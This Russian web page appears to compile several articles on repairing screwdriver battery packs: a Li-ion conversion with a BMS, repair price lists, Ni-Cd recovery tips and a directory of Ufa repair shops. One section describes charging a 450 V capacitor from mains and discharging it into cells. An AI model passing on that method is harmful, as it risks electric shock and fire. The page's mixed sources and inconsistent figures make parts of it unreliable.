51 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Ремонт аккумуляторов для шуруповерта в уфе

Ремонт аккумулятора шуруповерта

Замена старого Ni-Cd аккумулятора шуруповерта на Li-Ion ячейки

Шуруповерт давно стал обыденным инструментом практически в каждом доме. Для любительского использования в хозяйстве обычно выбирают недорогой шуруповерт из ближайшего супермаркета или сетевого строительного магазина. Такие инструменты оснащаются Ni-Cd аккумуляторами. Несмотря на то, что щелочные никель-кадмиевые аккумуляторы (Ni-Cd) можно считать морально устаревшими, их применяют для удешевления инструмента. Если при профессиональном использовании такие аккумуляторы выдают обещанный ресурс, то использование в режиме «5 саморезов в месяц» пагубно отражается на долговечности инструмента. Это связано с недостатками кадмиевых аккумуляторов: высокий саморазряд и «эффект памяти». Через пару лет такой эксплуатации мы получаем практически не изношенный шуруповерт с «убитыми» аккумуляторами.

Так случилось и в моем случае. Шуруповерт RYOBI CMD-1202 был приобретен мной по случаю ремонта на кухне и верой отслужил 3 года, после чего заряда аккумуляторов стало хватать на вкручивание пары средних саморезов. Данный шуруповерт был укомплектован двумя Ni-Cd аккумуляторными батареями напряжением 12 В емкостью 1,7 Ач. Стоимость двух новых аккумуляторов оказалась больше стоимости нового шуруповерта такого же класса с двумя аккумуляторами в комплекте. Последний и был приобретен для хозяйственных нужд. Старый шуруповерт отправился на заслуженный отдых в кладовку.

Недавно в просторах интернета наткнулся на статью о замене никель-кадмиевых элементов аккумулятора шуруповерта на литий-ионные (Li-ion) элементы питания формата 18650. Благо последние скопились в приличном количестве, в основном из раскуроченных аккумуляторов от ноутбуков. Потратив несколько часов на изучение вопроса, выяснилось, что предлагается несколько вариантов реализации такой замены.

1. Простое последовательное соединение необходимого количества элементов 18650 и использование родного зарядного устройства. Поверхностного знания об особенности зарядки последовательно соединенных аккумуляторов достаточно чтобы исключить такой вариант. Не вникая в технические термины можно сказать, что Li-ion аккумуляторы нельзя сильно разряжать и перезаряжать, только работа в пределах 2.5 — 4.2 V дает гарантию долгой и безопасной эксплуатации аккумуляторов. Зарядка переделанного таким образом аккумулятора родным зарядным устройством быстро выведет из строя Li-ion элементы, также не исключено их разрушение в результате перегрева.

2. Соединение элементов с добавлением дополнительных балансировочных проводов, которые выводятся в отдельное гнездо. Для зарядки используются «умные» зарядные устройства типа iMAX B6 и Turnigy Accucel-6 . Процесс зарядки в этом случае получается «правильным», однако, как и в первом случае, разрядка аккумуляторов никак не контролируется, и их чрезмерный разряд значительно сократит срок службы аккумулятора. Кроме того, возникает необходимость приобретения и использования специального зарядного устройства, в условиях стройки это крайне неудобно.

3. Есть и крайне экзотические реализации данной затеи. Некоторые встраивают миниатюрные вольтметры в корпус аккумулятора, по показаниям которого определяют степень заряженности. Опытные радиолюбители разрабатывают и изготавливают контроллеры заряда и балансировки. Эти решения либо трудно повторить, либо не обеспечивают должный контроль и требуемую надежность.

Определившись с техническим заданием: использование родного зарядного устройства для зарядки аккумуляторов, никаких дополнительных разъемов и проводов, наличие контроля заряда и балансировки элементов, начал искать варианты реализации. Как всегда, наши азиатские друзья не подвели, они предлагают множество вариантов модулей контроля заряда как единичных, так и соединенных Li-Ion аккумуляторов. На данном этапе надо выбрать номинальное напряжение для нашей Li-ion аккумуляторной батареи. Вариант 3S Li-ion батарей с диапазоном напряжений 12,6 — 7,5 V не подходит для силовой техники, так как при сильной нагрузке происходит сильная просадка напряжения даже на полностью заряженной батарее. Аккумулятор из 4S Li-Ion батарей с диапазоном напряжений 16,8 — 10 V обеспечит максимально продолжительную работу, а незначительное превышение рабочего напряжения не является критичным. Подходящий для меня вариант (покупал тут) имеет следующие характеристики:

Контроллер заряда и защиты BMS 4S для 4-х Li-Ion аккумуляторов 18650
Ограничение напряжения зарядки: 4.25 V
Ограничение (отсечка) разрядки: 2.5 V
Максимальный зарядный ток: 3 А
Пиковый ток разряда: 30 А
Рабочий ток разряда: 15 A
Защита от короткого замыкания
Защита от перезарядки/переразрядки
Защита от перегрузки по току

Приступаем непосредственно к переделке

Разбираем старый аккумулятор и извлекаем Ni-Cd элементы, как в большинстве таких аккумуляторов, контактная площадка закреплена непосредственно на одном из элементов, чтобы в дальнейшем не «колхозить» с креплением контактов, приклеиваем их вместе с этим элементом при помощи термоклея.

Собираем 4 элемента Samsung ICR18650-26C 2600 мАч таким образом, чтобы обеспечить максимально-удобное расположение в корпусе. Отдельные элементы соединяем припаивая провода, сделать это надо максимально быстро, чтобы не перегреть аккумулятор. Соединяем получившуюся батарею с платой защиты согласно схеме подключения.

Устанавливаем батарею в корпус. Аккумулятор готов.

Вес старых аккумуляторов с Ni-Cd элементами составлял 560 гр., новая Li-Ion батарея «похудела» на 180 гр. и весит 380 гр. При этом, почти удвоили энергетическую емкость с 20,4 Вт*ч (12 В х 1,7 Ач) до 38,48 Вт*ч (14,8 В х 2,6 Ач). Переделанный таким образом шуруповерт прослужит верным помощником еще много лет в нашем сервисном центре.

Первая зарядка

Начальные напряжения на элементах 3,85 — 3,95 В, заряжаем родным зарядным устройством. Для контроля потребляемого тока в разрыв провода между контактом аккумулятора и контроллером заряда подключен мультиметр в режиме измерения тока. Напряжение аккумуляторной батареи и отдельного элемента контролируем двумя миниатюрными цифровыми вольтметрами. На всякий случай с помощью инфракрасного термометра контролируем температуру элементов питания и транзисторов на плате контроллера заряда. Результаты зарядки приведены в таблице и графиках.

После завершения процесса зарядки напряжения на элементах 4,15 — 4,17 В, напряжение аккумулятора в целом — 16,63 В. В процессе зарядки температура элементов питания не поднималась выше 34,5 °C, плата контроллера заряда не нагрелась совсем.

Ремонт аккумуляторов

Почему не стоит сразу выбрасывать старый аккумулятор?

  • Цена ремонта значительно нижестоимости нового без потери качества. Ремонт в короткие сроки, доставка нового может занимать значительные сроки.

Часто бывает, что на редкие инструменты/приборы нет сменных новых аккумуляторов в продаже.

Можно отремонтировать аккумуляторные батареи на инструменты/приборы, которые уже давно не выпускаются и запчасти сняты с производства.

  • Некоторые изделия продаются с аккумуляторами маленькой емкости, при ремонте емкость можно сделать больше.

Мы восстанавливаем/ремонтируем
аккумуляторы

Li-Ion

(Никель — металл — гидридные)

КОТОРЫЕ ИСПОЛЬЗУЮТСЯ В

Подробнее о процессе восстановления/ремонта аккумулятора

Восстановление аккумуляторной батареи позволяет вернуть работоспособность вашей технике, которая будет работать в автономном режиме ещё дольше. Кроме того, по цене такие работы в 1,5-2 раза дешевле нового аккумулятора. А если вам нужно восстановить работоспособность редкого или встроенного аккумулятора, то стоимость ремонта может отличатся в 5 -10 раз.

Ремонту поддаются практически все батареи. Например, для электроинструмента можно произвести восстановление ni mh аккумуляторов (никель-металлогидридных), ni cd (никель-кадмиевых) и литий ионных аккумуляторов (li ion аккумулятора). Подробнее о возможности восстановления вашего аккумулятора уточните у наших специалистов. При восстановлении мы используем оригинальные батареи повышенной ёмкости с новыми nimh, nicd li — ion элементами. На них работают шуруповёрты, перфораторы и дрели Bosch или Макита.

Специфика, сроки и стоимость работ зависит от состояния самого инструмента и от параметров батареи. Как правило, аккумулятор восстанавливают полностью. Выборочно менять элементы нецелесообразно, так как можно больше потерять времени и денег. Если заменить только один элемент, то потом может выйти из строя другой.

Ремонт аккумуляторных батарей, то есть восстановление их работоспособности, производится путем замены вышедших из строя элементов, установленных в корпусе вашей батареи или устройства, на новые аналогичные по напряжению и емкости. При ремонте используются только качественные и проверенные аккумуляторные элементы, При необходимости вы можете заказать восстановление с увеличением емкости вашего аккумулятора. Так 1500 мАЧ батарея может получить емкость 2500 мАЧ и ваше устройство будет работать еще дольше на одной зарядке аккумулятора.

В работе обязательно используют точечную сварку (она позволяет качественно сварить тонкие материалы и не «перегреть» банку), а также специальную никелевую ленту. Это позволяет исключить окисление элементов и соблюсти качество сборки аналогичное заводскому производству.

Все элементы первый раз равномерно заряжаются в специальном зарядном устройстве, что обеспечивает долгий срок службы восстановленного аккумулятора.

Срок ремонта составляет примерно один-два дня при условии, если все элементы в наличии. На работы даётся гарантия 3 месяца.

Цены на ремонт аккумуляторов

Цена ремонта аккумулятора строится из стоимости работ и стоимости аккумулятора (количества банок и их емкости).

У разных аккумуляторных инструментов, бытовой техники (роботы-пылесосы, триммеры и др.) и электротранспорта (гироскутеры, сигвеи, электровелосипеды, электросамокаты, электроскутеры, моноколеса и др.) разные емкости, поэтому узнать точную стоимость ремонта аккумулятора можно запросив у нашего менеджера в сервисном центре, рассказав ему что именно Вы хотите отремонтировать, или написав нам в чат или на почту info@toolservis.ru.

Стоимость напайки аккумуляторных банок составит:

10,8 — 12 Вольт — 300,00 руб

14,4 Вольт — 400,00 руб.

18 Вольт — 500,00 руб

Пример, как рассчитывается стоимость ремонта аккумулятора:

Любой аккумулятор состоит из нескольких банок аккумуляторов. В аккумуляторе Ni-Cd и Ni-Mh каждая банка по 1,2 Вольт, поэтому соответственно для аккумулятора 12 Вольт потребуется 12/1,2=10 аккумуляторов/банок.

Стоимость самих новых аккумуляторов будет 10*119 руб.=1190 руб.

Добавляем стоимость напайки и сбора 300 руб.

Получается итоговая сумма ремонта аккумулятора Ni-Cd или Ni-Mh 1190 руб. + 300 руб. = 1490 руб.

Для аккумулятора Li-Ion каждая банка по 3,7 Вольт, поэтому соответственно для аккумулятора 14,4 Вольт потребуется 14,4/3,7=4 аккумуляторов/банок.

Стоимость самих новых аккумуляторов будет 4*195 руб.=780 руб.

Добавляем стоимость напайки и сбора 400 руб.

Получается итоговая сумма ремонта аккумулятора Li-Ion 780 руб. + 400 руб. = 1180 руб.

Хотите восстановить аккумулятор или задать какие-то вопросы
по ремонту,
звоните нам по тел. +7 (4852) 715-112 или приезжайте
к нам
в офис по адресу ул. Тургенева д. 17

Ремонт аккумуляторов для шуруповёрта.

Ремонт аккумуляторов для шуруповёрта в Тюмени

Ремонт аккумуляторов для шуруповёрта и другого электро инструмента. Замена Li-ion элементов на новые.

Замена Ni-Ca на Li-ion в аккумуляторе. Продажа Li-ion АКБ. Т. 8982-938-63-19

  1. Ремонт аккумуляторов для шуруповёрта
  2. Замена и ремонт аккумуляторов для шуруповёрта
  3. Неисправности аккумуляторов для шуруповёрта
  4. Эксплуатация аккумуляторов для шуруповёрта

Ремонт аккумуляторов для шуруповёрта доверьте специалистам. Можно при наличии навыков пайки и знание электротехники попытаться сделать самому.

Самый лучший вариант ремонта АКБ для шуруповёрта замена элементов Li-ion и Ni-Cd на новые. Для ремонта аккумуляторов для шуруповёрта тщательно выбирайте элементы на рынке много китайских подделок Li-ion АКБ фирм Samsung, LG, Panasonic, SANYO. Li-ion и Ni-Cd элементы должны выдерживать большой ток 10C-15C разряда за короткое время и заряд больше 1C.

Не покупайте собранные китайские аккумуляторы Bosch, Makita, Hitachi и Dewalt в них стоят плохие элементы. Их производят молодые компании у которых нет опыта в производстве элементов. При ремонте аккумуляторов для шуруповёрта желательно выбирать старые компании производителей Li-ion и Ni-Cd АКБ. Они обычно не производят подделок элементов Samsung, LG, Panasonic, SANYO а выпускают под собственным брендом.

При ремонте аккумуляторов для шуруповёрта ставьте элементы одной ёмкости и желательно одной компании.
Буква С означает ёмкость в ампер часах АКБ. Ампер часы измерение ёмкости и означают сколько Ампер отдаст элемент в течении часа например 2000мАч должен отдать 2 ампера в течении часа или 1 А в течении 2 часов.
При ремонте аккумуляторов для шуруповёрта не заменяйте родные элементы на обычные бытовые они не приспособлены к экстремальным режимам эксплуатации.
Не все АКБ Li-ion и Ni-Cd способны к быстрому заряду в течении 1-2 часов. У бытовых элементов ток заряда лежит в пределах 0,1-0,5 C и означает что он должен заряжаться малым током длительное время. Буква С означает ёмкость АКБ. Например 18650 2000 мАч должен заряжаться током 0,1C 200 мАч в течении 10 часов.
Зарядные устройства для шуруповёрта обеспечивают быструю зарядку большим током что вызывает перегрев АКБ и выключения.

Для замены и ремонта аккумуляторов для шуруповёрта нужны с большим током заряда больше 1С например 18650 2000 мАч ток заряда 1C заряд током 2 ампера в течении часа. В некоторых Li-ion АКБ DeWalt, Makita и других стоят микросхемы контроллёры заряд/разряд каждого элемента если какой то элемент потерял ёмкость то зарядное устройство сигнализирует о неисправности АКБ. Для ремонта аккумулятора для шуруповёрта можно попробовать заменить Li-ion элементы АКБ возможно восстановится работа но может потребоваться замена платы контроллёра.

Замена и ремонт аккумуляторов для шуруповёрта

Ремонт аккумуляторов для шуруповёрта начинают с определения неисправных элементов для этого нужен вольтметр. Измерьте напряжение на каждом элементе должно быть примерно одинаково Ni-Cd 1.2 Вольта а Li-ion 3.7 В под нагрузкой. В качестве нагрузки автомобильная лампочка 5-40 Вт. Элементы с заниженным напряжением скорее всего неисправны.
Для ремонта аккумуляторов шуруповёрта можно попробовать сделать из 2 нерабочих АКБ один исправный. Находим неисправные и заменяем их рабочими из другой АКБ элементы лучше взять с одинаковым напряжением и такой же ёмкости.
При ремонте аккумуляторов шуруповёрта лучше выполнять соединение с помощью точечной сварки но можно использовать мощный паяльник в качестве флюса взять ортофосфорную кислоту или флюс ЛТИ.

Собранную батарею элементов нужно разрядить до 0,8 В на 1 элемент потом каждый элемент полностью разрядить до нуля. Всю батарею разряжать до нуля нельзя некоторые банки могут поменять полярность. Разрядить каждую банку АКБ нужно чтобы при заряде все элементы набрали свою ёмкость в Li-ion аккумуляторах есть балансир заряда каждого элемента.
Для ремонта аккумуляторов шуруповёрта лучше взять зарядное устройство с асимметричным током заряда. Такое зарядное устройство восстанавливает и продляет работу АКБ. Асимметричный ток заряда когда во время заряда током 0,1C он ещё и разряжается малым током 0,01C. Зарядное устройство можно собрать самому для этого нужны следующие детали: трансформатор с удвоенным напряжением питания чем ваша АКБ, диод и два сопротивления. Схема на картинке. Сопротивление R1 регулирует ток заряда 0,1C а R2 ток разряда 0,01C.

Ремонт Li-ion АКБ для шуруповёрта

Для ремонта аккумуляторов для шуруповёрта Li-ion можно ставить новые элементы или рабочие б.у. В Li-ion АКБ может стоять контроллёр он отвечает за баланс заряда между элементами. Балансир заряда это контроль и стабилизация заряда на каждом элементе в батарее мах. 4,2 В на Li-ion элемент.
Также он контролирует температуру заряда АКБ при превышении около 60 градусов или низкой температуре подаёт сигнал зарядному устройству.
Для ремонта аккумуляторов для шуруповёрта может потребоваться и замена платы контроллёра.

Дело в том что микросхема контроллёра это микропроцессор он записывает в память данные о количестве циклов заряд/разряд о температуре и состоянии каждого элемента. Во время заряда контроллёр передаёт данные зарядному устройству он сигнализирует о превышении или низкой температуре заряда. Если неисправен элемент или несколько прекращает заряд и выдаёт сигнал о неисправности АКБ.

При ремонте аккумуляторов для шуруповёрта меняйте элементы на новые с током заряда большим чем 1C они заряжаются большим током за короткое время примерно 1 час. Простые аккумуляторы сильно нагреются что вызовет выключения зарядного устройства.

Ремонт Ni-Cd АКБ для шуруповёрта

При ремонте аккумуляторов для шуруповёрта Ni-Cd вы обнаружите что АКБ быстро заряжается и разряжается.

Эффект памяти появляется при частой зарядке не полностью разряженной Ni-Cd АКБ. Он состоит в том что аккумулятор не возьмёт свою полную ёмкость если вы поставили на заряд неполностью разряженные.

При ремонте аккумуляторов для шуруповёрта Ni-Cd вы столкнётесь с эффектом памяти. Эффект памяти это когда в порошке электролита кристаллы становятся больше (растут), при заряде не полностью разряженного АКБ, общая площадь электролита уменьшается что приводит к потере ёмкости элемента. Для его устранения делайте тренировочные циклы полный разряд АКБ и заряд. Для ремонта аккумулятора для шуруповёрта зарядите его до выключения зарядного устройства.

Разрядить до напряжения на каждом элементе 0,8 Вольт например 12 В АКБ 10 элементов значит разрядить надо до 8 В.
При ремонте аккумуляторов шуруповёрта измеряя напряжение на элементах оно может оказаться равно 0 В и малое сопротивление. В этом элементе кристаллы (Дендрит)выросли до больших размеров и вызвали короткое замыкание. Устранить и разрушить их можно с помощью мощного источника тока.

Для ремонта аккумулятора шуруповёрта в качестве мощного и импульсного источника тока можно взять электролитические конденсаторы. Я использовал конденсатор 200 мкФ на 450 В и заряжал от сети 220 В через сопротивление и диодный мост. Будьте аккуратны высокое напряжение сети и конденсатор зарядится примерно до 300 В.

При ремонте аккумулятора шуруповёрта разряжать конденсатор нужно на элемент с низким сопротивлением во время разряда плюсовой провод лучше держать на плюсе а минусовым проводом прикасаться для разряда. Делать разряд лучше через металлическую прокладку для избежания приварки провода к корпусу элемента. Этим методом можно восстановить некоторые элементы но уменьшится ёмкость и их лучше заменить на рабочие из другой АКБ. В NI-Mh АКБ элементах эффект памяти выражен в меньшей степени а в Li-ion он отсутствует.
Во многих профессиональных зарядных устройствах для заряда Ni-Cd и NI-Mh АКБ есть функция быстрой зарядки. Она обеспечивает большой ток заряда, эта функция также сокращает срок службы..

Неисправности аккумуляторов шуруповёрта.

Обычная неисправность потеря ёмкости АКБ в следствии неправильной эксплуатации и старения. После превышения числа циклов заряд/разряд ёмкость элемента снижается. Li-ion АКБ около 300-500 циклов заряд/разряд а Ni-Cd около 500 циклов. Ремонт аккумуляторов шуруповёрта можно отложить правильно их эксплуатируя. Ni-Cd АКБ нужно ставить на зарядку разряженными для удаления эффекта памяти.

Эксплуатация аккумуляторов для шуруповёрта

В строительстве широко используют аккумуляторный электро инструмент и в следствии чего часто меняют АКБ.
Ремонт аккумуляторов необходим в следствии неправильной эксплуатации.

Ремонт или восстановление аккумулятора шуруповерта

Всем привет! Сегодня затрону тему стройки и летних дачных занятий. Расскажу как провести ремонт или восстановление аккумулятора шуруповерта своими руками. Надо сказать, что шуруповерт — очень удобная вещь. Зарядил аккумулятор и бегаешь без проводов крутишь то тут, то там. Только со временем такая крутилка крутит все меньше и меньше. Это происходит из-за потери емкости аккумуляторами. Про них и пойдет речь.

Как устроен шуруповерт

Тут все достаточно просто. Простейший шуруповерт состоит из пластикового корпуса, аккумуляторной батареи (1), регулятора оборотов вращения (2), пластиковой кнопки (3), двигателя (4), редуктора (5) и патрона (6).

В современных шуруповертах чаще всего применяется редуктор с планетарной передачей усилия вращения.

Внутренности аккумулятора шуруповерта

Внутри аккумулятор шуруповерт устроен очень просто. Аккумуляторные банки соединены последовательно между собой металлической фольгой с помощью точечной сварки. В простейшем случае все заканчивается скользящими контактами.

Более сложные аккумуляторы имеют в своем составе платы контроллера заряда и разряда с отслеживанием температуры банок. Чаще всего такие платы ставятся в шуруповертах брендовых фирм с литий-ионными аккумуляторными секциями.

Дальше рассмотрим подробнее достоинства и недостатки разных видов аккумуляторных батарей и поговорим про восстановление аккумулятора своими руками.

Виды аккумуляторных элементов

За последние 20 — 30 лет разработано множество технологий портативных аккумуляторных батарей: Ni-Cd, Ni-Mh, Li-ion, Li-Pol, Al-Ion, Li-S, Mg-S, Li-O2, LiFePO4 и даже литий-нанофосфатные. Рассмотрим самые популярные из них.

Никель-кадмиевые аккумуляторы

Это самые популярный тип аккумуляторных секций для дешевых шуруповертов .

Достоинства: они дешево стоят и могут хорошо работать при отрицательных температурах. Также они не боятся разряда и хранения в таком положении.

Недостатки: кадмий токсичен и такие аккумуляторы нужно утилизировать специальным образом. Присутствует саморазряд и эффект памяти, низкая удельная объемная емкость.

Никель-металлгидридные аккумуляторы

Никель-металлгидридные стоят чуть подороже, но в целом по уровню они примерно такие же, может чуть лучше никель-кадмиевых.

Достоинства: не токсичны, меньший эффект памяти и саморазряд, большее число циклов заряда/разряда.

Недостатки: более чувствительны к отрицательным температурам, боятся хранения в разряженном состоянии — теряют емкость.

Литий-ионные аккумуляторы

Литий-ионные батареи все чаще применяются в шуруповертах даже бюджетного класса.

Достоинства: нет эффекта памяти — можно заряжать и разряжать в любой момент, большая емкость при меньших габаритах, малый саморазряд, большое число зарядов/разрядов.

Недостатки: высокая цена, опасность чрезмерного нагрева при интенсивном заряде и разряде.

Литий-полимерные аккумуляторы

Пока что литий-полимерные аккумуляторы мало применяются в шуруповертах, но с развитием технологий скорее всего их начнут туда ставить массово.

Достоинства: бОльшая емкость при меньших габаритах, чем у Li-ion, может принимать любую форму, напряжение при разряде держит лучше, низкий саморазряд.

Недостатки: высокая стоимость, нагрев при эксплуатации и опасность возгорания.

Восстановление аккумуляторных элементов

Тут я приведу историю от Мастера Сергея по восстановлению никель-кадмиевого аккумулятора шуруповерта. Владелец стал жаловаться на малое время работы электрошуруповерта и на то, что «аккумулятор не держит». Разборка корпуса аккумулятора показала, что там стоят заводские Ni-Cd банки от фирмы Liang на 1000 мАч.

Восстановить Ni-Cd аккумулятор можно достаточно простым способом. Нужно сделать несколько циклов глубокого разряда и заряда. В таких крайних режимах начинают работать труднодоступные области накопления заряда батареи, отдача от которых ухудшилась вследствие эффекта памяти, нарушения условий эксплуатации или хранения.

Такие проблемы возникают не только у шуруповертов. Индустрия радиоуправляемых моделей с батарейным питанием давно решила проблемы автоматизированного разряда/заряда. Для этого есть специальные зарядные устройства.

У Мастера Сергей оказался Vista Power AK610AC. Это зарядное с функцией заряда мощностью 90 Вт и разряда на нагрузку 20 Вт. Это прекрасный профессиональный аппарат с тач-скрином! Такой можно найти на Авито по цене около 5000 руб.

Вместо такого зарядного устройства можно использовать что-то более китайское, например народный IMAX B6 по цене около 2000 руб.

Начинать цикличное восстановление аккумулятора лучше всего с глубокого разряда аккумулятора и потом сразу зарядки.

После первого цикла емкость при разряде была равна 707 мАч, а при заряде — 879 мАч. Как видим, емкость снизилась на 30 % относительно заявленной производителем.

Второй цикла разряда/заряда показал цифры 781 мАч / 937 мАч. Как видим, это больше предыдущих значений на 10 %.

Третий цикла перезаряда аккумулятора показал незначительные отклонения от предыдущего второго перезаряда. Поэтому этого хватит. Если вы на своих аккумуляторах увидите, что емкость растет, то можно продолжить.

По факту восстановления аккумулятора удалось восстановить около 8% от первоначально заявленной емкости шуруповерта. В принципе неплохо, но я бы посоветовал заменить банки аккумулятора на новые с бОльшей емкостью .

Замена аккумуляторных элементов

В аккумуляторе у Сергея используются никель-кадмиевые батареи питания на 1,2 В. Они не взаимозаменяемы, поэтому лучше подбирать что-то похожее на оригинал по размеру и как можно большей емкости из доступных. У Сергея аккумуляторные элементы похожи на батареи типоразмера type D , поэтому их и заказываем. Можно найти с емкостью около 2400 мАч в тех же размерах.

Я уже писал, как менял аккумуляторные элементы шуруповерта Интерскол. В нем были литий-ионные банки на 3,7 В самого бюджетного класса, да еще и разряженные. Тогда я заменил их на батареи чуть получше. Сейчас я бы поставил фирменные Liitokala на 2200 мАч или аккумуляторы Panasonic на 3400 мАч типоразмера 18650.

Одно неудобно, что приходится паять чувствительные к перегреву аккумуляторы. Такой ремонт или восстановление аккумулятора может иметь обратный эффект. Выход такой — мощный паяльник держать 0,5 — 1 сек. или использовать аппарат для точечной сварки . Второй вариант понадежнее будет.

Запчасти для шуруповертов

Двигатели для шуруповертов редко сгорают, но если сгорят, то можно подобрать от другой модели за 500 — 1000 руб.

Часто в двигателях шуруповертов стираются угольные щетки . Их можно подобрать по нужным размерам и купить за 50 -100 руб.

Аккумуляторы для шуруповертов у многих фирм похожи друг на друга вплоть до формы и креплений. Поэтому, когда не хочется лезть в электронику, можно искать взаимозаменяемые варианты.

Зарядные устройства также нередко сгорают от перепадов напряжения сети или просто гибнут на стройке. Совместимый блок питания для зарядного устройства можно найти за 500 руб.

Биты для шуруповерта вообще относятся к расходному материалу. В зависимости от длины , металла и качества изготовления могут стоить от 20 до 500 руб.

На этом я закругляюсь и привожу видеоролик от Мастера Сергея по восстановлению никель-кадмиевого аккумулятора шуруповерта.

Ремонт электроинструмента в Уфе — 51 место

В рубрике «Ремонт электроинструмента, Уфа» нашлось 51 место с информацией – время работы, индексы, официальные сайты, отзывы, телефоны и адреса в Уфе.

РИ-Сервис

  • Уфа, Цветочная, 2/6
  • +7-937-331-91-11
  • Ближайшая остановка — Улица Комарова — 759м
  • Ремонт, тюнинг мототехники, Ремонт промышленного оборудования

Мастерская по ремонту инструмента

  • Уфа, Кирова, 101, цокольный этаж
  • +7 (347) 246-31-86
  • Ближайшая остановка — Магазин «Айский» — 145м
  • Ремонт промышленного оборудования, Ремонт электроинструмента

Бирюса сервис

  • Уфа, Академика Королёва, 6/1, 2 этаж
  • +7 (347) 236-57-07
  • Ближайшая остановка — Улица Академика Королёва — 126м
  • Ремонт компьютеров, Ремонт, установка бытовой техники

Торгово-сервисная компания

  • Уфа, Максима Рыльского, 19
  • +7-917-424-37-73
  • Ближайшая остановка — Улица Максима Рыльского — 148м
  • Ремонт, установка бытовой техники, Заточка, шлифовка режущих инструментов

БСИ-Инструмент

  • Уфа, Бакалинская, 7
  • +7 (347) 256-88-33
  • Ближайшая остановка — Улица Радищева — 144м
  • Пневматическое, компрессорное оборудование, Слесарно-монтажный инструмент

МАСТЕР-ЗАПЧАСТЬ

  • Уфа, Ибрагимова бульвар, 88, цокольный этаж
  • +7-937-359-76-02
  • Ближайшая остановка — Центр молодёжи — 111м
  • Ремонт электроинструмента, Электроинструмент

Мир инструмента

  • Уфа, Первомайская, 49, цокольный этаж
  • +7-917-779-48-66
  • Ближайшая остановка — ДК Химиков — 99м
  • Ремонт электроинструмента, Электроинструмент

Мир техники и инструмента

  • Уфа, Александра Невского, 22, цокольный этаж
  • +7-937-834-33-99
  • Ближайшая остановка — Улица Александра Невского — 344м
  • Ремонт электроинструмента, Электроинструмент

Ремонтная мастерская

  • Уфа, Первомайская, 24, цокольный этаж; 2 подъезд
  • +7-987-244-60-40
  • Ближайшая остановка — Детская библиотека — 108м
  • Ремонт промышленного оборудования, Заточка, шлифовка режущих инструментов

СпецТорг

  • Уфа, Интернациональная, 133а
  • +7 (347) 246-46-85
  • Ближайшая остановка — ДК УМПО — 383м
  • Ремонт промышленного оборудования, Сварочное оборудование

Сервисный центр

  • Уфа, Свободы, 15, 9-11 офис; цокольный этаж
  • +7-917-493-07-69
  • Ближайшая остановка — Улица Ивана Франко — 277м
  • Ремонт электроинструмента

Сервисный центр

  • Уфа, Свободы, 15, 6-8 офис; цокольный этаж
  • +7-917-421-91-13
  • Ближайшая остановка — Улица Ивана Франко — 277м
  • Ремонт электроинструмента, Ремонт бензоинструмента

ИНТЕРСКОЛ-Уфа

  • Уфа, Шафиева, 28, 1 этаж
  • +7 (347) 237-54-64
  • Ближайшая остановка — Улица Шафиева — 91м
  • Ремонт электроинструмента

Атлант

  • Уфа, Менделеева, 118а
  • +7-917-453-23-46
  • Ближайшая остановка — ТРК «Иремель» — 141м
  • Заточка, шлифовка режущих инструментов, Ремонт электроинструмента

Мастерская по ремонту электроинструмента

  • Уфа, Кировоградская, 33, цокольный этаж
  • +7-917-440-54-83
  • Ближайшая остановка — Завод «Магнетрон» — 143м
  • Ремонт электроинструмента

Компания по ремонту электро и бензоинструмента

  • Уфа, Чернышевского, 178а
  • +7-963-132-59-44
  • Ближайшая остановка — УГИС — 79м
  • Заточка, шлифовка режущих инструментов, Ремонт электроинструмента

UfaChip

  • Уфа, улица Бехтерева, 16
  • +7 (989) 954-93-44
  • Авторемонт и техобслуживание (СТО), Ремонт электроинструмента

КомпМастер

  • Уфа, Бакалинская улица, 9/3
  • +7 (905) 180-96-69
  • Электротехническая продукция, Ремонт компьютеров

Сервис центр

  • Уфа, улица Транспортная, 40/1
  • +7 (987) 582-52-92
  • Ремонт, установка бытовой техники, Аудиотехника, Видеотехника

НПП Рим Инжиниринг

  • Уфа, Революционная улица, 92
  • +7 (927) 087-03-74
  • Ремонт, установка бытовой техники, Ремонт промышленного оборудования
  • Уфа, Революционная улица, 98/2
  • +7 (347) 228-46-66
  • Жилищно-коммунальные услуги, Ремонт электроинструмента

Группа компаний УралСтан

  • Уфа, улица Кавказская, 12
  • +7 (347) 248-48-00
  • Ремонт электроинструмента, Деревообрабатывающее оборудование

Мастерская по ремонту электроинструментов, ИП Максимов Д. В.

  • Уфа, улица Кировоградская, 33
  • Телефон не указан
  • Гидравлическое оборудование, инструмент, Ремонт электроинструмента

Сервисный центр

  • Уфа, улица Кирова, 101
  • +7 (347) 246-31-86
  • Гидравлическое оборудование, инструмент, Ремонт электроинструмента

Русакова Л. И., ИП

  • Уфа, улица Обская, 20
  • Телефон не указан
  • Гидравлическое оборудование, инструмент, Оборудование для сельского хозяйства

А электрик

  • Уфа, улица Авроры, 5
  • +7 (917) 750-97-52
  • Электромонтажные работы, Кабель, Провод

Энергосвязь

  • Уфа, улица Шафиева, 44
  • +7 (987) 626-23-60
  • Электротехническая продукция, Кабель, Провод

Звезда

  • Уфа, улица Цюрупы, 156/3
  • +7 (347) 273-65-55
  • Ремонт промышленного оборудования, Ремонт электроинструмента

Цех по ремонту электродвигателей, ИП Ананьев В. П.

  • Уфа, улица Деревенская переправа, 15а
  • +7 (347) 274-95-98
  • Ремонт электроинструмента, Ремонт электродвигателей

Гилемзянов Д. Н., ИП

  • Уфа, улица Ростовская, 18
  • Телефон не указан
  • Электротехническая продукция, Ремонт электроинструмента

НПП Электромаш

  • Уфа, Трамвайная улица, 2/4
  • +7 (347) 224-28-75
  • Электротехническая продукция, Оборудование для промышленной маркировки

СпецТорг

  • Уфа, улица Трамвайная, 2/1
  • +7 (347) 246-46-85
  • Ремонт промышленного оборудования, Сварочное оборудование

Интенсо+

  • Уфа, проспект Октября, 106/2
  • 8 (800) 500-15-10 горячая линия
  • Оборудование для промышленной маркировки, Ремонт электроинструмента

Кернел

  • Уфа, улица Пархоменко, 156/1а
  • Телефон не указан
  • Ремонт промышленного оборудования, Оборудование для промышленной маркировки

Ремонт электродвигателей

  • Уфа, Павлика Морозова переулок, 19
  • +7 (917) 771-29-87
  • Электротехническая продукция, Ремонт электроинструмента

Электрооборудование

  • Уфа, улица Ахметова, 316
  • +7 (927) 350-00-49
  • Электротехническая продукция, Ремонт электроинструмента

Ремонт электроинструментов

  • Уфа, улица Первомайская, 24
  • +7 (987) 244-60-40
  • Ремонт электроинструмента

Очень понравилось обслуживание в компании Форс. Долго выбирал котел на твердом топливе, так как газа . читать весь отзыв

